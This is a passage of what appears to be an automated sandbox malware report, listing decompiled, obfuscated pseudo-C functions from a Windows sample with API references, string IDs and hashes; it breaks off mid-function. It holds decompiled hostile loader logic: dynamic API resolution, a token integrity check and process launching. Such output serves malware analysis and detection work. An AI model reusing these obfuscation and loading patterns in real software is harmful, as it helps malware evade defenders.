				_t171 = _t170;
				 *0x50afe6 = _t76 + 0xe4 - 0xec;
				 *((intOrPtr*)(_t174 - 0x14)) = _t105;
				 *(_t174 - 0x20) = "api-ms-win-core-rtlsupport-l1-1-0.dll";
				 *0x5081a2 = 0x69cac8;
				_t88 = GetTempPathW(0x104, ??);
				if(_t171 != 0) {
					 *0x50afe6 = _t88;
				}
				_t112 = "lyncicon.exe";
				if(_t88 != 0x3116) {
					L12:
					_t112 = _t88 + _t88;
					if(_t112 != 0x33) {
						goto L13;
					}
					goto L14;
				} else {
					if(_t112 == _t112) {
						 *(_t174 - 0x24) = _t112;
						if((_t88 & 0x000000ba) >= 0) {
							L13:
							 *(_t174 - 0x1c) =  &(( *(_t174 - 0x1c))[_t112]);
						} else {
							_t173 = _t173 + 0xc6e4;
							_t171 = _t171 >> 0xfffffffffffe201b;
							goto L12;
						}
						L14:
						 *0x508176 = 0x6170;
					}
				}
				_t119 = _t88;
				_t89 = _t88 + _t119;
				if((_t171 & _t173) == 0) {
					 *0x50afe6 = _t89;
				}
				if(_t171 <= 0x4ea) {
					_t119 = 0x2ed5d0;
				}
				 *(_t174 - 8) = _t89;
				_t91 =  *(_t174 - 0xc);
				 *0x50afda =  *0x50afda - _t91;
				 *0x5080ae =  *0x5080ae - _t119;
				_push(1);
				_push(0x4b1c14);
				_push(L004A9E48);
				return _t91;
			}



















                                                          0x004b196f
                                                          0x004b196f
                                                          0x004b1984
                                                          0x004b1996
                                                          0x004b199c
                                                          0x004b19a4
                                                          0x004b19ac
                                                          0x004b19ce
                                                          0x004b19d7
                                                          0x004b19e7
                                                          0x004b19f0
                                                          0x004b1a00
                                                          0x004b1a0d
                                                          0x004b1a10
                                                          0x004b1a13
                                                          0x004b1a1d
                                                          0x004b1a24
                                                          0x004b1a26
                                                          0x004b1a31
                                                          0x004b1a3c
                                                          0x004b1a4c
                                                          0x004b1a4f
                                                          0x004b1a69
                                                          0x004b1a71
                                                          0x004b1a74
                                                          0x004b1a77
                                                          0x004b1a7d
                                                          0x004b1a8b
                                                          0x004b1a8d
                                                          0x004b1a95
                                                          0x004b1aa2
                                                          0x004b1aa8
                                                          0x004b1abe
                                                          0x004b1abe
                                                          0x004b1ac3
                                                          0x004b1ac5
                                                          0x004b1acb
                                                          0x004b1acb
                                                          0x004b1ad3
                                                          0x004b1ad5
                                                          0x004b1b07
                                                          0x004b1b29
                                                          0x004b1b3f
                                                          0x004b1b46
                                                          0x004b1b55
                                                          0x004b1b57
                                                          0x004b1b57
                                                          0x004b1b61
                                                          0x004b1b6a
                                                          0x004b1b9a
                                                          0x004b1bab
                                                          0x004b1bb1
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004b1b6c
                                                          0x004b1b6f
                                                          0x004b1b71
                                                          0x004b1b8d
                                                          0x004b1bb3
                                                          0x004b1bb3
                                                          0x004b1b8f
                                                          0x004b1b8f
                                                          0x004b1b97
                                                          0x00000000
                                                          0x004b1b97
                                                          0x004b1bb8
                                                          0x004b1bbf
                                                          0x004b1bc6
                                                          0x004b1b6f
                                                          0x004b1bca
                                                          0x004b1bcc
                                                          0x004b1bd1
                                                          0x004b1bd3
                                                          0x004b1bd3
                                                          0x004b1bdf
                                                          0x004b1beb
                                                          0x004b1beb
                                                          0x004b1bf0
                                                          0x004b1bf5
                                                          0x004b1bf8
                                                          0x004b1bfe
                                                          0x004b1c07
                                                          0x004b1c09
                                                          0x004b1c0e
                                                          0x004b1c13

                                                          APIs
                                                          • GetTempPathW.KERNEL32(00000104,?,00000000,000085D2,000085D2), ref: 004B1B46
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: PathTemp
                                                          • String ID: BuildExplicitAccessWithNameA$CIRCoInst.dll$SystemPropertiesComputerName.exe$WcnEapAuthProxy.dll$ZwLoadKeyEx$api-ms-win-core-rtlsupport-l1-1-0.dll$charmap.exe$diskperf.exe$lyncicon.exe$wmi.dll
                                                          • API String ID: 2920410445-4198680935
                                                          • Opcode ID: ed294de963d9aa101be26fad55a27d2d63b0a3619ae6a461edb6cdafcf68bbfa
                                                          • Instruction ID: 69e065a493c3c7da7e1db9ee443ee437d24dd3f9a274a9ab539054f4f4af9e5d
                                                          • Opcode Fuzzy Hash: ed294de963d9aa101be26fad55a27d2d63b0a3619ae6a461edb6cdafcf68bbfa
                                                          • Instruction Fuzzy Hash: 8971D275E0430A8FCB00DFB8C8E0AEEBBF1FB2D320F44416AD940A7352E2381A458B55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00477BA9 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 224libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: EnumWindowStationsA$EtwEventWriteStartScenario$RemoveVectoredExceptionHandler$SystemPropertiesComputerName.exe$WSearchMigPlugin.dll$api-ms-win-core-sysinfo-l1-1-0.dll$credssp.dll$qS:$Nqt
                                                          • API String ID: 190572456-4021970367
                                                          • Opcode ID: 58f77f4c459cc923fb0bb4a5e02ef4cbe8a7f36437c7a9d2efb20143269c61e6
                                                          • Instruction ID: 3ce6bcee4b1523cb18ef34ea52ee1e8efc0e920c753f469567aca674a12bbc61
                                                          • Opcode Fuzzy Hash: 58f77f4c459cc923fb0bb4a5e02ef4cbe8a7f36437c7a9d2efb20143269c61e6
                                                          • Instruction Fuzzy Hash: 9891AC74A147069FCB00EFB9E894AED7BB0FF39320B44806AD985D7362E6740949E745
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004AA6D8 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 279COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000001,00000001,SystemPropertiesComputerName.exe,?,?,?), ref: 004AA9A7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: InformationToken
                                                          • String ID: ;:%$CIRCoInst.dll$Microsoft.Office.Tools.Outlook.v9.0.ni.dll$RtlEthernetStringToAddressW$SystemPropertiesComputerName.exe$lprmonui.dll$wmi.dll$~0>
                                                          • API String ID: 4114910276-414117194
                                                          • Opcode ID: 6ffcf11a0cceb10f65e297bc4cfa8325d29b1d31172b221f66799fa90ca36eef
                                                          • Instruction ID: 0074c2b5aa3de914f79d5e1df6a4f390b162db03097377c5267d726bf168f664
                                                          • Opcode Fuzzy Hash: 6ffcf11a0cceb10f65e297bc4cfa8325d29b1d31172b221f66799fa90ca36eef
                                                          • Instruction Fuzzy Hash: 6FB1D0B9E443469FCB00DFB8D894ADE7FB1EF39310B44406AC88597322D778494ADB46
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004A7985 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 219libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetProcAddress.KERNEL32(?), ref: 004A7C70
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: EtwEventWriteStartScenario$RemoveVectoredExceptionHandler$RtlEthernetStringToAddressW$SystemPropertiesComputerName.exe$diskperf.exe$e~8$lyncicon.exe$Nqt
                                                          • API String ID: 190572456-3986226046
                                                          • Opcode ID: b369350f807e65ed7d35adad650d10f5037d8cc152dfd4d0b60ca499b69cda8c
                                                          • Instruction ID: b309d37d325e5cc95c4722d0876e4b697e2b4e8f9f776b3c3b149e2ca7d5becf
                                                          • Opcode Fuzzy Hash: b369350f807e65ed7d35adad650d10f5037d8cc152dfd4d0b60ca499b69cda8c
                                                          • Instruction Fuzzy Hash: 2781DFAAA44742CFCB11DF78EC589DE3B71EB3A724708426EC8809BB66E6340549E745
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0048C5CA Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 130libraryloaderCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 48%
                                                          			E0048C5CA() {
				_Unknown_base(*)()* _t27;
				_Unknown_base(*)()* _t31;
				_Unknown_base(*)()* _t32;
				_Unknown_base(*)()* _t35;
				_Unknown_base(*)()* _t43;
				short _t72;
				signed char _t73;
				intOrPtr _t75;
				void* _t82;
				signed short _t83;
				void* _t85;
				signed short _t86;
				signed int _t88;
				signed int _t89;
				unsigned short _t90;
				void* _t93;

				 *0x50afdd =  *0x50afdd + _t72;
				 *0x508150 = _t72;
				_t27 =  *(_t93 - 8);
				_t73 =  *0x5081a0; // 0xea90
				 *0x50afdf =  *0x50afdf - _t82;
				 *0x5081ea =  *0x5081ea + _t82;
				_t83 = _t82 + _t82;
				 *(_t93 - 8) = _t27;
				_push(_t27);
				_push(_t27);
				_push(_t27);
				E00467687();
				_push( *0x5083db);
				_t31 =  *(_t93 - 8);
				 *0x50afdc =  *0x50afdc +  *((intOrPtr*)(_t93 - 0xc));
				 *((intOrPtr*)(_t93 - 0x10)) =  *((intOrPtr*)(_t93 - 0x10)) - _t73;
				if(_t73 != _t73) {
					L3:
					_t83 = 0xa7ba;
					 *0x50afe1 = _t31;
					L4:
					_t32 = GetProcAddress();
					 *0x5081fa =  *0x5081fa - _t83;
					_t85 = _t83 + _t83;
					if((_t90 & 0x00ac94b7) == 0) {
						_t90 = _t90 >> _t73;
					}
					_t89 =  !_t88;
					 *0x50afd8 =  *0x50afd8 - _t32;
					_t56 = 0xec - _t32 + 0x1be5;
					 *(_t93 - 8) = _t32;
					if(0xec - _t32 + 0x1be5 < 0x2e3bee) {
						_t56 = "lprmonui.dll";
						_t73 = _t73 + _t73 - 0x72a0;
						 *0x5081ae =  *0x5081ae - _t85;
					}
					 *0x5081cc =  *0x5081cc + _t85;
					E004650DC(_t56, _t73, _t85, _t89, _t90, _t85);
					_t86 = _t85 + 0xad;
					_t35 =  *(_t93 - 8);
					 *0x50914b = _t35;
					 *(_t93 - 8) = _t35;
					if(_t35 != 0x27) {
						 *0x50afdc =  *0x50afdc - 0x3f3010;
						 *0x5081a2 = _t86;
						_t86 = _t86 - 0x98;
						if((_t86 & 0x00009d2e) >= 0) {
							 *0x50823c = _t90;
						}
						_t90 = 0x508289;
						 *0x50afe5 = _t35;
					}
					 *((intOrPtr*)(_t93 - 0x14)) =  *((intOrPtr*)(_t93 - 0x14)) - 0x5556b6;
					 *0x508170 = 0x5556b6;
					_push(0);
					_t75 =  *0x50815a; // 0x98
					 *0x5081c4 = _t86;
					_t43 =  *(_t93 - 8);
					 *((intOrPtr*)(_t93 - 0xc)) = 0x2cc8e7;
					if(_t75 + 0x73 >= _t75 + 0x73) {
						_t86 = 0x986e;
					}
					 *0x509b1f =  *0x509b1f + _t86;
					_push( *0x508044);
					 *0x50afe6 = _t43;
					 *(_t93 - 8) = _t43;
					_push(_t43);
					_push(1);
					_push(E0048C7C2);
					goto __eax;
				}
				_t73 = _t73 - 0x72;
				if((_t73 & 0x00000082) >= 0) {
					goto L4;
				}
				 *0x5081c4 = _t83;
				goto L3;
			}



















                                                          0x0048c5d0
                                                          0x0048c5d6
                                                          0x0048c5e0
                                                          0x0048c5e3
                                                          0x0048c5ea
                                                          0x0048c5f0
                                                          0x0048c5f7
                                                          0x0048c5f9
                                                          0x0048c5fc
                                                          0x0048c5fd
                                                          0x0048c5fe
                                                          0x0048c5ff
                                                          0x0048c60f
                                                          0x0048c61f
                                                          0x0048c625
                                                          0x0048c62b
                                                          0x0048c630
                                                          0x0048c641
                                                          0x0048c648
                                                          0x0048c64c
                                                          0x0048c652
                                                          0x0048c655
                                                          0x0048c65b
                                                          0x0048c662
                                                          0x0048c670
                                                          0x0048c672
                                                          0x0048c672
                                                          0x0048c67d
                                                          0x0048c67f
                                                          0x0048c687
                                                          0x0048c68c
                                                          0x0048c697
                                                          0x0048c6a5
                                                          0x0048c6ac
                                                          0x0048c6b1
                                                          0x0048c6b1
                                                          0x0048c6b8
                                                          0x0048c6c0
                                                          0x0048c6c8
                                                          0x0048c6cb
                                                          0x0048c6d3
                                                          0x0048c6d8
                                                          0x0048c6dd
                                                          0x0048c6e7
                                                          0x0048c6fa
                                                          0x0048c704
                                                          0x0048c70c
                                                          0x0048c70e
                                                          0x0048c70e
                                                          0x0048c71d
                                                          0x0048c71e
                                                          0x0048c723
                                                          0x0048c748
                                                          0x0048c74b
                                                          0x0048c755
                                                          0x0048c757
                                                          0x0048c761
                                                          0x0048c772
                                                          0x0048c775
                                                          0x0048c781
                                                          0x0048c790
                                                          0x0048c790
                                                          0x0048c794
                                                          0x0048c79a
                                                          0x0048c7a2
                                                          0x0048c7b0
                                                          0x0048c7b3
                                                          0x0048c7b4
                                                          0x0048c7b6
                                                          0x0048c7c0
                                                          0x0048c7c0
                                                          0x0048c632
                                                          0x0048c638
                                                          0x00000000
                                                          0x00000000
                                                          0x0048c63a
                                                          0x00000000

                                                          APIs
                                                          • GetProcAddress.KERNEL32(?,?), ref: 0048C655
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: AddInUtil.exe$B5d$api-ms-win-core-rtlsupport-l1-1-0.dll$lprmonui.dll$tsbyuv.dll$wlanmsm.dll$;.$Nqt
                                                          • API String ID: 190572456-4062036808
                                                          • Opcode ID: 79cf4af2a589e2ff93dc5e92c8df364dabac33ad5654eb12c0d69cd6902ea72c
                                                          • Instruction ID: 23b041c6d9b549e1c4f6cf04645bc91d1e6679a4b44fee2a4a4f772b40168ae2
                                                          • Opcode Fuzzy Hash: 79cf4af2a589e2ff93dc5e92c8df364dabac33ad5654eb12c0d69cd6902ea72c
                                                          • Instruction Fuzzy Hash: DC41D0B9A147469FCB00DF74EC94AED3BB0EF39310B04416ED881D7762E639050AEB56
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004B22A1 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 118COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 87%
                                                          			E004B22A1(void* __eax, void* __ecx, void* __edx, void* __esi) {
				long _t39;
				long _t41;
				char* _t42;
				long _t44;
				long _t46;
				char* _t62;
				intOrPtr _t71;
				void* _t80;
				void* _t105;
				void* _t107;

				_t104 = __esi;
				_t80 = __ecx;
				_t39 =  *(_t107 - 8);
				if( *((intOrPtr*)(_t107 - 0x3c)) == 0xffffffff) {
					 *0x5081d6 =  *0x5081d6 - 0x85cb;
					 *(_t107 - 8) = _t39;
					if(_t39 < 0x2057) {
						if(_t62 != 0x39) {
							_t62 = "api-ms-win-core-rtlsupport-l1-1-0.dll";
						}
					}
					_t82 = 0x674c;
					 *0x5081a6 = 0x674c;
					_t98 = 0x871324;
					_t41 = GetLastError();
					 *0x5081f4 = 0x871324;
					 *(_t107 - 8) = _t41;
					_t42 = "wmi.dll";
					if(_t62 == 0x25f343) {
						_t62 = "LookupPrivilegeValueA";
						_t82 = 0xe16f;
						_t98 =  *0x5081fa; // 0x8a34
					}
					 *0x50afe1 = _t42;
					_t105 = _t104 + 0xc800;
					 *0x50afe5 = 0;
					_t44 =  *(_t107 - 8);
					 *(_t107 - 8) = _t44;
					 *(_t107 - 8) = _t44;
					_t46 =  *(_t107 - 8);
					 *(_t107 - 0x44) = _t46;
					if((_t98 - 0x0000009d & 0x000000a5) == 0) {
						 *0x509dc3 =  *0x509dc3 - _t105;
					}
					 *(_t107 - 8) = _t46;
					E004B009D(_t46, 0, _t82, _t46, _t46, _t46);
					 *((intOrPtr*)(_t107 - 0x10)) =  *((intOrPtr*)(_t107 - 0x10)) + 0x36e765;
					 *((intOrPtr*)(_t107 - 0xc)) =  *((intOrPtr*)(_t107 - 0xc)) + 0x22a07e;
					 *((intOrPtr*)(_t107 - 0x10)) = 0x36e765;
					 *0x508136 =  *0x508136 + _t82;
					_push(0x4b2ed4);
					goto __ecx;
				}
				_t71 =  *0x50afe6; // -97
				 *(_t107 - 8) = _t39;
				E004AD34D(_t39 + _t39, _t71, __ecx, __edx, 0, __esi);
				_push(0);
				E004A8400(_t80);
				 *((intOrPtr*)(_t107 - 0xc)) =  *((intOrPtr*)(_t107 - 0x14));
				 *((intOrPtr*)(_t107 - 0x14)) = 0;
				 *((intOrPtr*)(_t107 - 0x10)) = 0x370155;
				_push(0);
				_push(0x4b2333);
				_push(L004A9E48);
				return "credssp.dll";
			}













                                                          0x004b22a1
                                                          0x004b22a1
                                                          0x004b22a6
                                                          0x004b22ad
                                                          0x004b2dc8
                                                          0x004b2dd8
                                                          0x004b2ddf
                                                          0x004b2de7
                                                          0x004b2de9
                                                          0x004b2de9
                                                          0x004b2de7
                                                          0x004b2df1
                                                          0x004b2df5
                                                          0x004b2dfe
                                                          0x004b2e07
                                                          0x004b2e0d
                                                          0x004b2e14
                                                          0x004b2e17
                                                          0x004b2e22
                                                          0x004b2e2a
                                                          0x004b2e39
                                                          0x004b2e4c
                                                          0x004b2e4c
                                                          0x004b2e53
                                                          0x004b2e5b
                                                          0x004b2e60
                                                          0x004b2e65
                                                          0x004b2e6a
                                                          0x004b2e6d
                                                          0x004b2e74
                                                          0x004b2e7e
                                                          0x004b2e87
                                                          0x004b2e89
                                                          0x004b2e8f
                                                          0x004b2e91
                                                          0x004b2e97
                                                          0x004b2ea4
                                                          0x004b2eb2
                                                          0x004b2eb5
                                                          0x004b2ebe
                                                          0x004b2ec8
                                                          0x004b2ed2
                                                          0x004b2ed2
                                                          0x004b22b5
                                                          0x004b22bb
                                                          0x004b22c1
                                                          0x004b22c6
                                                          0x004b22c8
                                                          0x004b22f0
                                                          0x004b22fd
                                                          0x004b2311
                                                          0x004b2326
                                                          0x004b2328
                                                          0x004b232d
                                                          0x004b2332

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast
                                                          • String ID: 9$EtwEventWriteStartScenario$LookupPrivilegeValueA$api-ms-win-core-rtlsupport-l1-1-0.dll$credssp.dll$ddrawex.dll$e6$wmi.dll
                                                          • API String ID: 1452528299-3063859001
                                                          • Opcode ID: aa220abc887c320e64c723956fdb153e27a2e262982ddbea6a7548dfd2a478bb
                                                          • Instruction ID: a6e478682443e68e8968b33daed8ebd62e7cb5a9751b673da70cfb5c82a60409
                                                          • Opcode Fuzzy Hash: aa220abc887c320e64c723956fdb153e27a2e262982ddbea6a7548dfd2a478bb
                                                          • Instruction Fuzzy Hash: E7418074E4030AAFCB00DFB9D885ADDBBB0FF28320F44816A9855E7785D6B80A46DB55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004760B6 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 218libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetProcAddress.KERNEL32(?), ref: 00476259
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: WindowsCodecs.dll$ddrawex.dll$nshhttp.dll$w&)$Nqt$;
                                                          • API String ID: 190572456-1639350716
                                                          • Opcode ID: f472174720b0d8767453a1aa6d74500204f3a14c1a5673d4f146e5cc38dd5398
                                                          • Instruction ID: 18d2f73edac6bd089ddb15175c90a4063f18d71f38de32ca7bc446af12e68f98
                                                          • Opcode Fuzzy Hash: f472174720b0d8767453a1aa6d74500204f3a14c1a5673d4f146e5cc38dd5398
                                                          • Instruction Fuzzy Hash: B891D2B5E447469FCB01DFB8EC94ADD7FB1FB39310B0440AAC88497362E2750949EB45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004E4127 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 203COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E004E4127(unsigned int __ecx, void* __edx, void* __edi, void* __esi) {
				struct _SHELLEXECUTEINFOW* _t65;
				struct _SHELLEXECUTEINFOW* _t71;
				signed int _t73;
				struct _SHELLEXECUTEINFOW* _t75;
				struct _SHELLEXECUTEINFOW* _t78;
				int _t79;
				struct _SHELLEXECUTEINFOW* _t88;
				signed int _t107;
				intOrPtr _t129;
				unsigned short _t146;
				short _t147;
				intOrPtr _t148;
				signed int _t149;
				void* _t159;
				short _t160;
				signed int _t161;
				signed short _t162;
				void* _t164;
				signed int _t168;
				signed short _t170;
				void* _t173;

				_t164 = __edi;
				_t159 = __edx;
				_t65 =  *(_t173 - 8);
				_t146 = __ecx >> __ecx;
				 *(_t173 - 8) = _t65;
				if(_t65 >= 0x19bfc5) {
					_t146 =  *0x50812e; // 0x6c03
					 *0x50afde =  *0x50afde - _t146;
					 *0x50817e =  *0x50817e + _t146;
				}
				_t147 = _t146 + _t146;
				 *((intOrPtr*)(_t173 - 0x64)) = 1;
				 *0x508156 = _t147;
				 *0x508170 = _t147;
				_t148 =  *0x5081a4; // 0x81e6
				_t160 = _t159 - 0x8e3a;
				 *0x5081f0 = _t160;
				_t161 = _t160 + _t160;
				 *(_t173 - 0xc) = 0x1d7f42;
				 *(_t173 - 8) = _t173 - 0x80;
				 *(_t173 - 0xc) = 0xc3;
				 *((intOrPtr*)(_t173 - 0x1c)) = _t148;
				if(_t148 >= _t148) {
					 *((intOrPtr*)(_t173 - 0x24)) =  *((intOrPtr*)(_t173 - 0x24)) + _t148 + 0x71d2;
					 *0x5081c8 = _t161;
					_t161 = _t161 - 0x979566;
				}
				_t71 =  *(_t173 - 8);
				 *0x50805a =  *0x50805a - _t71;
				 *(_t173 - 8) = _t71;
				_t73 =  *(_t173 - 8);
				 *((intOrPtr*)(_t173 - 0x10)) = 0x122a5b + _t71;
				 *(_t173 - 8) = _t73;
				 *(_t173 - 0xc) =  !_t73;
				_t75 =  *(_t173 - 8);
				 *(_t173 - 0x84) = _t75;
				_t149 =  *0x5081a2; // 0xea53
				 *0x5081ec = _t161;
				 *0x508208 = _t161;
				 *(_t173 - 8) = _t75;
				 *0x508082 =  *0x508082 - 0x1cfc1a;
				_t78 =  *(_t173 - 8);
				_t107 =  *(_t173 - 0x14);
				if(_t107 < _t107) {
					if(_t107 > _t149) {
						L9:
						_t161 = _t161;
						 *0x50afe1 = _t78;
					} else {
						_t149 = 0x6f29;
						if(0x6f29 < 0x6f29 || (_t161 & 0x00000089) < 0) {
							_t161 = _t161 + 0x8e203d;
							goto L9;
						}
					}
				}
				_t168 = 0x50a7e1;
				_t79 = ShellExecuteExW( *(_t173 - 0x84));
				if((_t161 & 0x0097123e) != 0 || 0xa020 <= 0) {
					_t168 = _t168 + _t168 - 0xd7bf;
					if(_t164 < 0) {
						 *(_t173 - 8) =  *(_t173 - 8) + _t79;
						 *0x50afdc =  *0x50afdc - 0x2df03c;
					}
					_t149 = _t161;
					_t161 =  *0x5081cc; // 0x48e8
				}
				 *0x50afe3 =  *0x50afe3 - _t79;
				_t170 = _t168 & 0x00c26faa;
				 *0x50841b = _t79;
				if(_t79 == 1) {
					 *0x50afd8 =  *0x50afd8 - _t79;
					 *0x50afd9 =  *0x50afd9 - _t79;
					_t129 =  *((intOrPtr*)(_t173 - 0x1c));
					 *(_t173 - 8) = _t79;
					 *((intOrPtr*)(_t173 - 0x10)) = _t129;
					 *((intOrPtr*)(_t173 - 0x10)) = _t129;
					 *(_t173 - 0x18) = "psxdllsvr.dll";
					_t88 =  *(_t173 - 8);
					 *(_t173 - 8) = _t88;
					if(_t88 < 0x15503e) {
						 *(_t173 - 0x14) =  !0x319947;
					}
					_t79 =  *(_t173 - 8);
					_t149 =  !0x5eb9;
					 *((intOrPtr*)(_t173 - 0x88)) = 1;
				}
				 *0x5081dc =  *0x5081dc + _t161;
				_t162 = _t161 + _t161;
				if((_t162 & 0x0000a71a) >= 0) {
					L22:
					 *0x50afe6 = _t79;
					 *0x50afd9 =  *0x50afd9 - _t79;
					if(_t79 <= 0x29ff) {
						 *(_t173 - 0x14) =  *(_t173 - 0x14) - 0x3ae18d;
					}
					 *0x5081aa = _t162;
				} else {
					if((_t170 & 0x0000b6df) >= 0) {
						goto L22;
					}
				}
				return  *((intOrPtr*)(_t173 - 0x88));
			}
























                                                          0x004e4127
                                                          0x004e4127
                                                          0x004e412c
                                                          0x004e412f
                                                          0x004e4135
                                                          0x004e413d
                                                          0x004e414c
                                                          0x004e4153
                                                          0x004e4159
                                                          0x004e4159
                                                          0x004e4160
                                                          0x004e4170
                                                          0x004e417a
                                                          0x004e4181
                                                          0x004e4188
                                                          0x004e418f
                                                          0x004e4194
                                                          0x004e419b
                                                          0x004e41a5
                                                          0x004e41be
                                                          0x004e41c6
                                                          0x004e41d4
                                                          0x004e41d9
                                                          0x004e41e0
                                                          0x004e41e3
                                                          0x004e41f0
                                                          0x004e41f6
                                                          0x004e41fa
                                                          0x004e4202
                                                          0x004e420c
                                                          0x004e4213
                                                          0x004e4216
                                                          0x004e421b
                                                          0x004e4220
                                                          0x004e422b
                                                          0x004e422e
                                                          0x004e4234
                                                          0x004e423b
                                                          0x004e4242
                                                          0x004e4249
                                                          0x004e4251
                                                          0x004e425a
                                                          0x004e425d
                                                          0x004e4262
                                                          0x004e4267
                                                          0x004e427f
                                                          0x004e427f
                                                          0x004e4281
                                                          0x004e426c
                                                          0x004e426c
                                                          0x004e4272
                                                          0x004e4279
                                                          0x00000000
                                                          0x004e4279
                                                          0x004e4272
                                                          0x004e4267
                                                          0x004e4287
                                                          0x004e4298
                                                          0x004e42a4
                                                          0x004e42af
                                                          0x004e42b8
                                                          0x004e42bf
                                                          0x004e42ca
                                                          0x004e42ca
                                                          0x004e42d7
                                                          0x004e42da
                                                          0x004e42e3
                                                          0x004e42e8
                                                          0x004e42ee
                                                          0x004e42fc
                                                          0x004e4306
                                                          0x004e4314
                                                          0x004e431a
                                                          0x004e432f
                                                          0x004e433d
                                                          0x004e4345
                                                          0x004e4348
                                                          0x004e4368
                                                          0x004e438b
                                                          0x004e4391
                                                          0x004e4399
                                                          0x004e43a6
                                                          0x004e43a6
                                                          0x004e43b0
                                                          0x004e43b3
                                                          0x004e43b5
                                                          0x004e43b5
                                                          0x004e43c1
                                                          0x004e43c8
                                                          0x004e43d0
                                                          0x004e43e0
                                                          0x004e43e0
                                                          0x004e43f0
                                                          0x004e43fa
                                                          0x004e4404
                                                          0x004e4407
                                                          0x004e4412
                                                          0x004e43d2
                                                          0x004e43d7
                                                          0x00000000
                                                          0x004e43de
                                                          0x004e43d7
                                                          0x004e4423

                                                          APIs
                                                          • ShellExecuteExW.SHELL32(?), ref: 004E4298
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: ExecuteShell
                                                          • String ID: EtwEventWriteStartScenario$charmap.exe$ddrawex.dll$de7$psxdllsvr.dll$xmllite.dll
                                                          • API String ID: 587946157-549880681
                                                          • Opcode ID: 4befaf33527f7da0f86a870cad30398446eb246e4f8d55ca61f114bea9562803
                                                          • Instruction ID: 05f30665b6eaf5ff5092fd22524fba29bfdfeb6f75f6fcd323570ad4567ef2d4
                                                          • Opcode Fuzzy Hash: 4befaf33527f7da0f86a870cad30398446eb246e4f8d55ca61f114bea9562803
                                                          • Instruction Fuzzy Hash: D5816E79E0474A8BCB00DFBAD8846DDBBB1FB39310F04416AD984E7752E6780A89DB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004AB1FF Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 26%
                                                          			E004AB1FF(void* __ebx, intOrPtr __ecx, signed char __edx, void* __eflags) {
				char* _t52;
				char* _t70;
				intOrPtr* _t73;
				char* _t74;
				void* _t100;
				intOrPtr _t122;
				signed int _t123;
				signed char _t126;
				signed char _t139;
				signed int _t143;
				void* _t148;
				signed short _t150;
				void* _t153;

				_t139 = __edx;
				_t122 = __ecx;
				L00466DA9(__ebx, _t148, 0, 0, 1);
				 *0x508222 = _t139;
